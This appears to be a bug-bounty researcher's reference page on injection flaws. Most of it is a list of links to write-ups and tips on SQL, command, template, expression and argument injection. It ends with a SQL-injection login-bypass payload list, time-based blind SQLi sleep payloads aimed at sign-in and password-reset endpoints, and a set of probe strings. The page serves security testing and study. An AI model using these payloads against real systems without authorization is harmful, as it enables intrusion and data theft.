# Injection

**Blogs / Articles:**

* <https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3>
* <https://threat.tevora.com/stop-collaborate-and-listen/> - Blind Command Injection - SSRF
* <https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z>
* <https://gerbenjavado.com/manual-sql-injection-discovery-tips/>
* Practical JSONP Injection - [Practical JSONP Injection](https://securitycafe.ro/2017/01/18/practical-jsonp-injection/)
* XSLT Server Side Injection Attacks [https://contextis.com/blog/xslt-server-side-injection-attacks](https://t.co/ZqvTP3qZTZ?amp=1)
* Log Injection - <https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/>
* Remote Code Execution with EL injection - [https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://t.co/eUvA6wDgFA?amp=1)
* Argument Injection - <https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/>
* Argument Injection - <https://staaldraad.github.io/post/2019-11-24-argument-injection/>
* Argument Injection - <https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68>
  * Video - <https://www.youtube.com/watch?v=FHiJnw9TTX8>
* **AST Injection, Prototype Pollution to RCE -** [**https://blog.p6.is/AST-Injection/#How-to-Detect**](https://blog.p6.is/AST-Injection/#How-to-Detect)
* **SSTI -** [**https://blog.isec.pl/beyond-ssti/**](https://blog.isec.pl/beyond-ssti/)
* [**https://bad-jubies.github.io/Blind-SQLi-1/**](https://bad-jubies.github.io/Blind-SQLi-1/)
* [**https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17**](https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17)
* **CSS Injection -** [**https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092**](https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092)
* [**https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1**](https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1)
* [**https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716**](https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716)
* [**https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b**](https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b)
* **SQL Injection -** [**https://twitter.com/rodoassis/status/1438186092486877190?s=20**](https://twitter.com/rodoassis/status/1438186092486877190?s=20)
* [**https://outpost24.com/blog/X-forwarded-for-SQL-injection**](https://outpost24.com/blog/X-forwarded-for-SQL-injection)
* [How I Escalated a Time-Based SQL Injection to RCE](https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398)

**Payloads / Cheatsheets:**

* <https://github.com/Gabriel-Labs/OOB-SQLi>

**Twitter Threads / Tips:**

* [**https://github.com/xer0days/SQLi-Query-Tampering**](https://github.com/xer0days/SQLi-Query-Tampering) **-** [**https://twitter.com/Xer0Days/status/1292488714241941504?s=20**](https://twitter.com/Xer0Days/status/1292488714241941504?s=20)
* [1. Time Based SQL Injection : Used payload: '+(select\*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters \[Like username, email, otp\] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )](https://twitter.com/sunilyedla2/status/1333029227994628096?s=20)
* [Time based SQLi -> forgot password Endpoint 1. Payload used: '%2b(select\*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)
* SPEL Injection - <https://twitter.com/h1pmnh/status/1425831338234589184?s=20>
* EL Injection - <https://twitter.com/secalert/status/1119526862521282560?s=20>

**Tools:**

**Other References:**

```
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

[Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=\[1\] /?q\[\]=1 /?q=1\` /?q=1\ /?q=1/\*'\*/ /?q=1/\*!1111'\*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection](https://twitter.com/community_bug/status/1345942914296205316?s=20)

